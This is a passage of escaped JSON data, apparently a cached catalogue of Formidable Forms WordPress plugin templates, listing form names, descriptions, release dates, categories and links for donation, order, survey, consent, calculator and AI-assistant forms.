applications.\",\"id\":28031324,\"released\":\"2020-12-01 00:01:19\",\"categories\":[\"Application\",\"Business Operations\",\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/sponsor-donation-form\\/\",\"icon\":false,\"key\":\"sponsor-donation\",\"is_new\":false},\"28145245\":{\"name\":\"Lab Supply Order Form Template\",\"slug\":\"lab-supply-order-form\",\"description\":\"Select laboratory products and process orders online with the Lab supply order form.\",\"id\":28145245,\"released\":\"2022-11-06 00:00:00\",\"categories\":[\"Business\",\"Health and Wellness\",\"Order Form\",\"PayPal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/lab-supply-order-form\\/\",\"icon\":false,\"key\":\"lab-supply-order\",\"is_new\":false},\"28056672\":{\"name\":\"General Event Feedback Template\",\"slug\":\"general-event-feedback-form\",\"description\":\"Collect valuable event feedback from your event attendees.\",\"id\":28056672,\"released\":\"2021-04-27 17:27:18\",\"categories\":[\"Business\",\"Event Planning\",\"Feedback\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/general-event-feedback-form\\/\",\"icon\":false,\"key\":\"general-event-feedback\",\"is_new\":false},\"28145251\":{\"name\":\"Media Release Form Template\",\"slug\":\"media-release-form\",\"description\":\"Grant consent or authorization to share media in various outlets and business marketing.\",\"id\":28145251,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Business Operations\",\"Marketing\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/media-release-form\\/\",\"icon\":false,\"key\":\"media-release\",\"is_new\":false},\"28142704\":{\"name\":\"Bid Form Template\",\"slug\":\"bid-form\",\"description\":\"Save time by allowing contractors to submit their project proposals with the Bid form template.\",\"id\":28142704,\"released\":\"2022-08-17 14:27:39\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/bid-form\\/\",\"icon\":false,\"key\":\"bid\",\"is_new\":false},\"28172146\":{\"name\":\"FAQ Form Template\",\"slug\":\"faq-form\",\"description\":\"Find information quickly and easily provide answers to the most frequently asked questions.\",\"id\":28172146,\"released\":\"2023-02-07 16:18:43\",\"categories\":[\"Business\",\"Conversational Forms\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/faq-form\\/\",\"icon\":false,\"key\":\"faq\",\"is_new\":false},\"28029811\":{\"name\":\"Donation Pledge Form Template\",\"slug\":\"donation-pledge-form\",\"description\":\"Don\'t be stuck on how to take pledges from donors. This template will keep everything organized.\",\"id\":28029811,\"released\":\"2020-12-01 00:01:27\",\"categories\":[\"Business\",\"Nonprofit\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/donation-pledge-form\\/\",\"icon\":false,\"key\":\"donation-pledge\",\"is_new\":false},\"28179829\":{\"name\":\"Parental Contact Form Template\",\"slug\":\"parental-contact-form\",\"description\":\"Using our short and easy parental contact form template can save you time and ensure that you have all the necessary information in one place. Our template is designed to be straightforward and user-friendly, allowing parents and guardians to provide the essential information needed to care for their child without any confusion or hassle.\",\"id\":28179829,\"released\":\"2023-02-21 12:47:16\",\"categories\":[\"Basic\",\"Contact\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/parental-contact-form\\/\",\"icon\":false,\"key\":\"parental-contact\",\"is_new\":false},\"28194423\":{\"name\":\"AI Pre-Sale Assistant Form Template\",\"slug\":\"ai-pre-sale-assistant-form\",\"description\":\"Streamline your pre-sale experience with our AI-powered assistant. Simply ask a question and you will receive an answer.\",\"id\":28194423,\"released\":\"2023-04-28 16:11:47\",\"categories\":[\"AI\",\"Business\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/ai-pre-sale-assistant-form\\/\",\"icon\":false,\"key\":\"ai-pre-sale-assistant\",\"is_new\":false},\"28172151\":{\"name\":\"Personal Information Form Template\",\"slug\":\"personal-information-form\",\"description\":\"Whether it is for completing documents or collecting information about a person, use the personal information form template for an easy way to gather personal data.\",\"id\":28172151,\"released\":\"2023-02-07 16:29:38\",\"categories\":[\"Business\",\"Conversational Forms\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/personal-information-form\\/\",\"icon\":false,\"key\":\"personal-information\",\"is_new\":false},\"28192889\":{\"name\":\"Pay Raise Calculator Form Template\",\"slug\":\"pay-raise-calculator-form\",\"description\":\"Easily calculate what your salary will be after a pay raise.\",\"id\":28192889,\"released\":\"2023-04-20 17:40:33\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/pay-raise-calculator-form\\/\",\"icon\":false,\"key\":\"pay-raise-calculator\",\"is_new\":false},\"28054906\":{\"name\":\"Square Root Calculator Template\",\"slug\":\"square-root-calculator-form\",\"description\":\"This calculator is great for solving square roots, which are notoriously difficult to calculate.\",\"id\":28054906,\"released\":\"2021-08-28 10:53:21\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/square-root-calculator-form\\/\",\"icon\":false,\"key\":\"square-root-calculator\",\"is_new\":false},\"28200063\":{\"name\":\"Straw Poll Form Template\",\"slug\":\"straw-poll-form\",\"description\":\"This form is designed to collect your valuable input on various topics through a straw poll. By participating in this quick survey, you can share your preferences, opinions, or choices on specific questions.\",\"id\":28200063,\"released\":\"2023-05-30 17:53:42\",\"categories\":[\"Business\",\"Conversational Forms\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/straw-poll-form\\/\",\"icon\":false,\"key\":\"straw-poll\",\"is_new\":false},\"28052355\":{\"name\":\"Girl Scout Cookie Order Form Template\",\"slug\":\"girl-scout-cookie-order-form\",\"description\":\"Want a better way of selling Girl Scout cookies? Collect orders without knocking on doors or sitting outside the grocery store.\",\"id\":28052355,\"released\":\"2021-03-31 17:18:05\",\"categories\":[\"Calculator\",\"Order Form\",\"Payment\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/girl-scout-cookie-order-form\\/\",\"icon\":false,\"key\":\"girl-scout-cookie-order\",\"is_new\":false},\"28054406\":{\"name\":\"YouTube Money Calculator\",\"slug\":\"youtube-money-calculator-form\",\"description\":\"Use this <a href=\\\"https:\\/\\/formidableforms.com\\/how-to-generate-leads-with-a-calculator-lead-magnet\\/\\\">lead magnet<\\/a> to tell visitors how much money they can make via YouTube. This is the ad revenue calculator for you.\",\"id\":28054406,\"released\":\"2021-08-10 16:21:21\",\"categories\":[\"Business\",\"Calculator\",\"Finance\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/youtube-money-calculator-form\\/\",\"icon\":false,\"key\":\"youtube-money-calculator\",\"is_new\":false},\"28029321\":{\"name\":\"Model Release Form Template\",\"slug\":\"model-release-form\",\"description\":\"Photographers can get permission from models to use and publish their photos.\",\"id\":28029321,\"released\":\"2020-11-23 00:02:19\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/model-release-form\\/\",\"icon\":false,\"key\":\"model-release\",\"is_new\":false},\"28195727\":{\"name\":\"BMI Calculator AI Form Template\",\"slug\":\"bmi-calculator-ai-form\",\"description\":\"This form allows users to input their height and weight to calculate their Body Mass Index (BMI) and receive personalized feedback from an AI coach based on their results. The coach provides insights on maintaining a healthy lifestyle and achieving weight-related goals.\",\"id\":28195727,\"released\":\"2023-05-05 19:26:23\",\"categories\":[\"AI\",\"Business\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/bmi-calculator-ai-form\\/\",\"icon\":false,\"key\":\"bmi-calculator-ai\",\"is_new\":false},\"28104595\":{\"name\":\"Online Contact Us Form Template\",\"slug\":\"online-contact-us-form\",\"description\":\"Simple and easy way to get information from your customers.\",\"id\":28104595,\"released\":\"2022-03-07 14:07:46\",\"categories\":[\"Business\",\"Contact\",\"Customer Service\",\"Feedback\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/online-contact-us-form\\/\",\"icon\":false,\"key\":\"online-contact-us\",\"is_new\":false},\"28194205\":{\"name\":\"AI Auto-Mate Form Template\",\"slug\":\"ai-auto-mate-form\",\"description\":\"This AI Auto-Mate Auto finder Form Template utilizes AI to help you find your perfect car.\",\"id\":28194205,\"released\":\"2023-04-27 17:48:25\",\"categories\":[\"AI\",\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/ai-auto-mate-form\\/\",\"icon\":false,\"key\":\"ai-auto-mate\",\"is_new\":false},\"28192671\":{\"name\":\"Employee Performance Survey Template\",\"slug\":\"employee-performance-survey-form\",\"description\":\"A good way to keep track on how well each employee is doing.\",\"id\":28192671,\"released\":\"2023-04-19 18:39:59\",\"categories\":[\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-performance-survey-form\\/\",\"icon\":false,\"key\":\"employee-performance-survey\",\"is_new\":false},\"28056480\":{\"name\":\"Retreat Registration Form Template\",\"slug\":\"retreat-registration-form\",\"description\":\"This retreat registration form is great for booking attendees for a getaway.\",\"id\":28056480,\"released\":\"2021-08-02 15:55:08\",\"categories\":[\"Event Planning\",\"Personal\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/retreat-registration-form\\/\",\"icon\":false,\"key\":\"retreat-registration\",\"is_new\":false},\"28029860\":{\"name\":\"Non Profit Donation Form Template\",\"slug\":\"non-profit-donation-form\",\"description\":\"This donation form template will help nonprofits or charities easily collect donor information & raise money.\",\"id\":28029860,\"released\":\"2020-12-01 00:00:38\",\"categories\":[\"Business\",\"Nonprofit\",\"Payment\",\"PayPal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/non-profit-donation-form\\/\",\"icon\":false,\"key\":\"non-profit-donation\",\"is_new\":false},\"28029862\":{\"name\":\"Silent Auction Donation Form Template\",\"slug\":\"auction-donation-form\",\"description\":\"Collect donated items and bids for your fundraiser.\",\"id\":28029862,\"released\":\"2020-12-01 00:01:21\",\"categories\":[\"Basic\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/auction-donation-form\\/\",\"icon\":false,\"key\":\"auction-donation\",\"is_new\":false},\"28142760\":{\"name\":\"Cake Order Form Template\",\"slug\":\"cake-order-form\",\"description\":\"Want to sell more cakes online? Use the cake order form to view incoming cake orders instantly.\",\"id\":28142760,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Conversational Forms\",\"Geolocation\",\"Order Form\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/cake-order-form\\/\",\"icon\":false,\"key\":\"cake-order\",\"is_new\":false},\"28029609\":{\"name\":\"In-Kind Donation Form Template\",\"slug\":\"in-kind-donation-form\",\"description\":\"This simple in-kind template will make it easier to collect non-cash donations for your organization.\",\"id\":28029609,\"released\":\"2020-12-01 00:01:13\",\"categories\":[\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/in-kind-donation-form\\/\",\"icon\":false,\"key\":\"in-kind-donation\",\"is_new\":false},\"28029611\":{\"name\":\"Donation Form Template\",\"slug\":\"donation-form\",\"description\":\"Nonprofits can collect donations the easy way. It is perfect for organizations of all types and sizes!\",\"id\":28029611,\"released\":\"2020-12-01 00:01:43\",\"categories\":[\"Nonprofit\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/donation-form\\/\",\"icon\":false,\"key\":\"donation\",\"is_new\":false},\"28029869\":{\"name\":\"Employee Evaluation Form Template\",\"slug\":\"employee-evaluation-form\",\"description\":\"An employee evaluation form template can make human resources easy. This template will help your team fly through performance reviews!\",\"id\":28029869,\"released\":\"2021-09-20 10:35:29\",\"categories\":[\"Business\",\"Calculator\",\"Feedback\",\"Signature\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-evaluation-form\\/\",\"icon\":false,\"key\":\"employee-evaluation\",\"is_new\":false},\"28015029\":{\"name\":\"College Application Form Template\",\"slug\":\"college-application-form\",\"description\":\"A great an easy way to collect details for college admissions.\",\"id\":28015029,\"released\":\"2020-08-13 11:37:03\",\"categories\":[\"Application\",\"Business\",\"Education\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/college-application-form\\/\",\"icon\":false,\"key\":\"college-application\",\"is_new\":false},\"28015030\":{\"name\":\"High School Calculator Template\",\"slug\":\"high-school-calculator-form\",\"description\":\"A quick and easy form that can calculate a GPA in a matter of moments.\",\"id\":28015030,\"released\":\"2020-09-28 08:10:52\",\"categories\":[\"Business\",\"Calculator\",\"Education\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/high-school-calculator-form\\/\",\"icon\":false,\"key\":\"high-school-calculator\",\"is_new\":false},\"28015031\":{\"name\":\"Event Planner Form Template\",\"slug\":\"event-planner-form\",\"description\":\"A simple form used to collect data on an event. Useful for planning and simple processing of data.\",\"id\":28015031,\"released\":\"2020-08-07 11:09:13\",\"categories\":[\"Basic\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/event-planner-form\\/\",\"icon\":false,\"key\":\"event-planner\",\"is_new\":false},\"28015032\":{\"name\":\"Expense Reimbursement Form Template\",\"slug\":\"reimbursement-form\",\"description\":\"A form that can allow you to easily gather expense reimbursements in any setting.\",\"id\":28015032,\"released\":\"2020-08-07 11:20:50\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/reimbursement-form\\/\",\"icon\":false,\"key\":\"reimbursement\",\"is_new\":false},\"28150464\":{\"name\":\"Informed Consent Form Template\",\"slug\":\"informed-consent-form\",\"description\":\"Get consent from an individual to participate in a study with this Informed consent form example.\",\"id\":28150464,\"released\":\"2022-11-06 16:42:00\",\"categories\":[\"Business\",\"Education\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/informed-consent-form\\/\",\"icon\":false,\"key\":\"informed-consent\",\"is_new\":false},\"22214080\":{\"name\":\"Employee Satisfaction Survey Template\",\"slug\":\"employee-satisfaction-survey-form\",\"description\":\"Job satisfaction matters - get data with a user-friendly survey!\",\"id\":22214080,\"released\":\"2020-05-27 10:55:52\",\"categories\":[\"Business\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-satisfaction-survey-form\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2020\\/05\\/employee-engagement-survey-template.jpg\",650,288,false],\"key\":\"employee-satisfaction-survey\",\"is_new\":false},\"28173761\":{\"name\":\"Player Profile Template\",\"slug\":\"player-profile-form\",\"description\":\"Collect information of players to play in your team with the Player Profile template.\",\"id\":28173761,\"released\":\"2023-01-24 15:42:33\",\"categories\":[\"Business\",\"Conversational Forms\",\"Education\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/player-profile-form\\/\",\"icon\":false,\"key\":\"player-profile\",\"is_new\":false},\"28053955\":{\"name\":\"Student Budget Calculator Template\",\"slug\":\"student-budget-calculator-form\",\"description\":\"This handy student budget calculator will help students figure out expenses and income while attending a university or college.\",\"id\":28053955,\"released\":\"2021-08-20 17:16:48\",\"categories\":[\"Business\",\"Calculator\",\"Education\",\"Finance\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/student-budget-calculator-form\\/\",\"icon\":false,\"key\":\"student-budget-calculator\",\"is_new\":false},\"28150471\":{\"name\":\"Membership Form Template\",\"slug\":\"membership-form\",\"description\":\"Gather personal information from potential members along with membership fees with this form template.\",\"id\":28150471,\"released\":\"2022-11-06 16:44:00\",\"categories\":[\"Business\",\"Geolocation\",\"PayPal\",\"Registration and Signup\",\"Signature\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/membership-form\\/\",\"icon\":false,\"key\":\"membership\",\"is_new\":false},\"28052681\":{\"name\":\"Newspaper Subscription Form Template\",\"slug\":\"newspaper-subscription-form\",\"description\":\"Get out all pertinent information for newspaper subscriptions submitted electronically through your website using PayPal.\",\"id\":28052681,\"released\":\"2021-08-03 16:06:55\",\"categories\":[\"Payment\",\"PayPal\",\"Personal\",\"Registration and Signup\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/newspaper-subscription-form\\/\",\"icon\":false,\"key\":\"newspaper-subscription\",\"is_new\":false},\"28150475\":{\"name\":\"Credit Card Authorization Form Template\",\"slug\":\"credit-card-authorization-form\",\"description\":\"Automatically arrange recurring payments between the cardholder and merchant with this credit card authorization form template.\",\"id\":28150475,\"released\":\"2022-11-06 18:47:00\",\"categories\":[\"Business\",\"Business Operations\",\"Geolocation\",\"Payment\",\"Signature\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/credit-card-authorization-form\\/\",\"icon\":false,\"key\":\"credit-card-authorization\",\"is_new\":false},\"28194252\":{\"name\":\"Bio Writing Assistant Form Template\",\"slug\":\"bio-writing-assistant-form\",\"description\":\"Use this writing assistant to create a unique super-hero themed bio personalized to you.\",\"id\":28194252,\"released\":\"2023-04-27 18:24:39\",\"categories\":[\"AI\",\"Business\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/bio-writing-assistant-form\\/\",\"icon\":false,\"key\":\"bio-writing-assistant\",\"is_new\":false},\"28052685\":{\"name\":\"Performance Improvement Plan Form Template\",\"slug\":\"performance-improvement-plan-form\",\"description\":\"Get an easier way to review and employee performance and make a plan for improvement.\",\"id\":28052685,\"released\":\"2021-04-21 11:29:02\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/performance-improvement-plan-form\\/\",\"icon\":false,\"key\":\"performance-improvement-plan\",\"is_new\":false},\"28058573\":{\"name\":\"Partnership Agreement Form Template\",\"slug\":\"partnership-agreement-form\",\"description\":\"This form is great for recording an agreement with a partner.\",\"id\":28058573,\"released\":\"2021-07-26 15:35:46\",\"categories\":[\"Business\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/partnership-agreement-form\\/\",\"icon\":false,\"key\":\"partnership-agreement\",\"is_new\":false},\"28194254\":{\"name\":\"Product Name Generator Form Template\",\"slug\":\"product-name-generator-form\",\"description\":\"Use this form template to generate many unique and fitting product names just by giving a short and simple description of your product.\",\"id\":28194254,\"released\":\"2023-04-27 18:39:17\",\"categories\":[\"AI\",\"Business\",\"Marketing\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/product-name-generator-form\\/\",\"icon\":false,\"key\":\"product-name-generator\",\"is_new\":false},\"28168654\":{\"name\":\"Instant Estimate Form Template\",\"slug\":\"instant-estimate-form\",\"description\":\"Provide prospective clients an instant estimate requesting your services.\",\"id\":28168654,\"released\":\"2022-12-28 08:35:27\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\",\"Lead\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/instant-estimate-form\\/\",\"icon\":false,\"key\":\"instant-estimate\",\"is_new\":false},\"28194256\":{\"name\":\"Book Buddy Form Template\",\"slug\":\"book-buddy-form\",\"description\":\"Use our Book Buddy form template to receive book recommendations based on former books you\'ve read.\",\"id\":28194256,\"released\":\"2023-04-27 18:45:25\",\"categories\":[\"AI\",\"Business\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/book-buddy-form\\/\",\"icon\":false,\"key\":\"book-buddy\",\"is_new\":false},\"28194258\":{\"name\":\"AI Travel Assistant Form Template\",\"slug\":\"ai-travel-assistant-form\",\"description\":\"Get a detailed itinerary for your vacation by simply inputting some basic information.\",\"id\":28194258,\"released\":\"2023-04-27 18:53:54\",\"categories\":[\"AI\",\"Business\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/ai-travel-assistant-form\\/\",\"icon\":false,\"key\":\"ai-travel-assistant\",\"is_new\":false},\"28150482\":{\"name\":\"Authorization Form Template\",\"slug\":\"authorization-form\",\"description\":\"Get authorization from an individual to release their information with an authorization form template.\",\"id\":28150482,\"released\":\"2022-11-06 16:50:00\",\"categories\":[\"Business\",\"Business Operations\",\"Geolocation\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/authorization-form\\/\",\"icon\":false,\"key\":\"authorization\",\"is_new\":false},\"28029398\":{\"name\":\"WordPress Search Form Template\",\"slug\":\"wordpress-search-form\",\"description\":\"Search your WordPress site using this simple form.\",\"id\":28029398,\"released\":\"2020-11-23 00:05:43\",\"categories\":[\"Personal\",\"Post\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/wordpress-search-form\\/\",\"icon\":false,\"key\":\"wordpress-search\",\"is_new\":false},\"28052697\":{\"name\":\"Alumni Donation Template\",\"slug\":\"alumni-donation-form\",\"description\":\"Are you hoping for donations to your school? If so, this is the form for you.\",\"id\":28052697,\"released\":\"2021-04-01 15:50:54\",\"categories\":[\"Business\",\"Nonprofit\",\"Payment\",\"PayPal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/alumni-donation-form\\/\",\"icon\":false,\"key\":\"alumni-donation\",\"is_new\":false},\"28055776\":{\"name\":\"Employee Engagement Survey Template\",\"slug\":\"employee-engagement-survey-form\",\"description\":\"Use this survey to find our how employees feel about their jobs.\",\"id\":28055776,\"released\":\"2021-06-28 13:33:52\",\"categories\":[\"Business\",\"Business Operations\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-engagement-survey-form\\/\",\"icon\":false,\"key\":\"employee-engagement-survey\",\"is_new\":false},\"28057313\":{\"name\":\"Management Performance Survey Template\",\"slug\":\"management-performance-survey-form\",\"description\":\"Collect feedback on your management from employees they supervise.\",\"id\":28057313,\"released\":\"2021-05-01 13:50:24\",\"categories\":[\"Business Operations\",\"Personal\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/management-performance-survey-form\\/\",\"icon\":false,\"key\":\"management-performance-survey\",\"is_new\":false},\"28145636\":{\"name\":\"Consent Form Template\",\"slug\":\"consent-form\",\"description\":\"Capture participant\\u2019s information and signature with this consent form.\",\"id\":28145636,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/consent-form\\/\",\"icon\":false,\"key\":\"consent\",\"is_new\":false},\"28174310\":{\"name\":\"360 Degree Feedback Template\",\"slug\":\"360-degree-feedback-form\",\"description\":\"This short and quick survey is an easy way to acquire information from employees.\",\"id\":28174310,\"released\":\"2023-01-26 19:21:52\",\"categories\":[\"Basic\",\"Feedback\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/360-degree-feedback-form\\/\",\"icon\":false,\"key\":\"360-degree-feedback\",\"is_new\":false},\"28145640\":{\"name\":\"Waiver Form Template\",\"slug\":\"waiver-form\",\"description\":\"Have participants sign and agree to any unforeseen injury\\/risks involved with the activity using the waiver form.\",\"id\":28145640,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Education\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/waiver-form\\/\",\"icon\":false,\"key\":\"waiver\",\"is_new\":false},\"28149480\":{\"name\":\"Employee Discipline Form Template\",\"slug\":\"employee-discipline-form\",\"description\":\"When an employee intentionally violates the rules and policies of the company they are working for, use this Employee Discipline form to submit a report.\",\"id\":28149480,\"released\":\"2022-11-06 16:24:00\",\"categories\":[\"Business\",\"Business Operations\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/employee-discipline-form\\/\",\"icon\":false,\"key\":\"employee-discipline\",\"is_new\":false},\"28145641\":{\"name\":\"Deposit Form Template\",\"slug\":\"deposit-form\",\"description\":\"Issue a receipt for funds accepted through cash deposit, checks, money order, and cashier\\u2019s check.\",\"id\":28145641,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Business\",\"Calculator\",\"Payment\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/deposit-form\\/\",\"icon\":false,\"key\":\"deposit\",\"is_new\":false},\"28149481\":{\"name\":\"Entry Form Template\",\"slug\":\"entry-form\",\"description\":\"Collect entries for contests, competitions, or events, and let users upload their entry.\",\"id\":28149481,\"released\":\"2022-11-06 16:34:00\",\"categories\":[\"Basic\",\"Marketing\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/entry-form\\/\",\"icon\":false,\"key\":\"entry\",\"is_new\":false},\"28145642\":{\"name\":\"Requisition Form Template\",\"slug\":\"requisition-form\",\"description\":\"Specify details about the requested items with the requisition form.\",\"id\":28145642,\"released\":\"2022-11-06 22:00:00\",\"categories\":[\"Basic\",\"Business Operations\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/requisition-form\\/\",\"icon\":false,\"key\":\"requisition\",\"is_new\":false},\"28176880\":{\"name\":\"Branding Questionnaire Form Template\",\"slug\":\"branding-questionnaire-form\",\"description\":\"An easy questionnaire to help determine all you need to know about your client\'s business and branding choices.\",\"id\":28176880,\"released\":\"2023-02-07 17:50:28\",\"categories\":[\"Basic\",\"Business Operations\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/branding-questionnaire-form\\/\",\"icon\":false,\"key\":\"branding-questionnaire\",\"is_new\":false},\"28198899\":{\"name\":\"Love Language Quiz Form Template\",\"slug\":\"love-language-quiz-form\",\"description\":\"Discover your love language and enhance your connections. Take our quiz to understand how you express and receive love.\",\"id\":28198899,\"released\":\"2023-05-30 18:32:58\",\"categories\":[\"Business\",\"Conversational Forms\",\"Personal\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/love-language-quiz-form\\/\",\"icon\":false,\"key\":\"love-language-quiz\",\"is_new\":false},\"28198901\":{\"name\":\"AI Customer Support Form Template\",\"slug\":\"ai-customer-support-form\",\"description\":\"Our Customer Support Form efficiently collects essential information and addresses inquiries. Gather personal details and select the inquiry type for efficient handling.\",\"id\":28198901,\"released\":\"2023-05-30 17:49:52\",\"categories\":[\"AI\",\"Business\",\"Customer Service\",\"Feedback\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/ai-customer-support-form\\/\",\"icon\":false,\"key\":\"ai-customer-support\",\"is_new\":false},\"28028149\":{\"name\":\"Customer Referral Form Template\",\"slug\":\"customer-referral-form\",\"description\":\"Let your customers introduce you to a potential Customer\",\"id\":28028149,\"released\":\"2020-11-23 00:01:44\",\"categories\":[\"Basic\",\"Customer Service\",\"Marketing\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/customer-referral-form\\/\",\"icon\":false,\"key\":\"customer-referral\",\"is_new\":false},\"28098549\":{\"name\":\"Spelling Quiz Template\",\"slug\":\"spelling-quiz-form\",\"description\":\"Track student progress online with the spelling quiz form template.\",\"id\":28098549,\"released\":\"2022-03-01 13:50:10\",\"categories\":[\"Business\",\"Education\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/spelling-quiz-form\\/\",\"icon\":false,\"key\":\"spelling-quiz\",\"is_new\":false},\"28173813\":{\"name\":\"Free Estimate Form Template\",\"slug\":\"free-estimate-form\",\"description\":\"Whether you\'re in construction or any industry, use this template to generate the estimated cost for your customer\'s needs.\",\"id\":28173813,\"released\":\"2023-01-24 16:56:38\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\",\"Conversational Forms\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/free-estimate-form\\/\",\"icon\":false,\"key\":\"free-estimate\",\"is_new\":false},\"28028151\":{\"name\":\"Restaurant Evaluation Survey Template\",\"slug\":\"restaurant-evaluation-survey-form\",\"description\":\"Get feedback and ratings from customers on the quality of your services.\",\"id\":28028151,\"released\":\"2020-11-23 00:01:21\",\"categories\":[\"Basic\",\"Business Operations\",\"Feedback\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/restaurant-evaluation-survey-form\\/\",\"icon\":false,\"key\":\"restaurant-evaluation-survey\",\"is_new\":false},\"28028153\":{\"name\":\"Counseling Intake Form Template\",\"slug\":\"counseling-client-intake-form\",\"description\":\"Automate the process of gathering information from your clients and reduce paperwork with this intake form\",\"id\":28028153,\"released\":\"2020-11-23 00:01:11\",\"categories\":[\"Business\",\"Health and Wellness\",\"Signature\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/counseling-client-intake-form\\/\",\"icon\":false,\"key\":\"counseling-client-intake\",\"is_new\":false},\"28196091\":{\"name\":\"Trivia Form Template\",\"slug\":\"trivia-form\",\"description\":\"The trivia form template challenges your knowledge on a variety of topics and will give you your score at the end.\",\"id\":28196091,\"released\":\"2023-05-08 11:52:40\",\"categories\":[\"Business\",\"Quiz\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/trivia-form\\/\",\"icon\":false,\"key\":\"trivia\",\"is_new\":false},\"28028157\":{\"name\":\"Client Intake Form Template\",\"slug\":\"client-intake-form\",\"description\":\"Capture valuable information during the client intake process.\",\"id\":28028157,\"released\":\"2020-11-23 00:05:11\",\"categories\":[\"Business\",\"Business Operations\",\"Customer Service\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/client-intake-form\\/\",\"icon\":false,\"key\":\"client-intake\",\"is_new\":false},\"28031311\":{\"name\":\"Esthetician Consent Form Template\",\"slug\":\"esthetician-consent-form\",\"description\":\"Capture information about your client\'s needs and preferences in terms of cosmetic or skin treatment with this simple esthetician consent 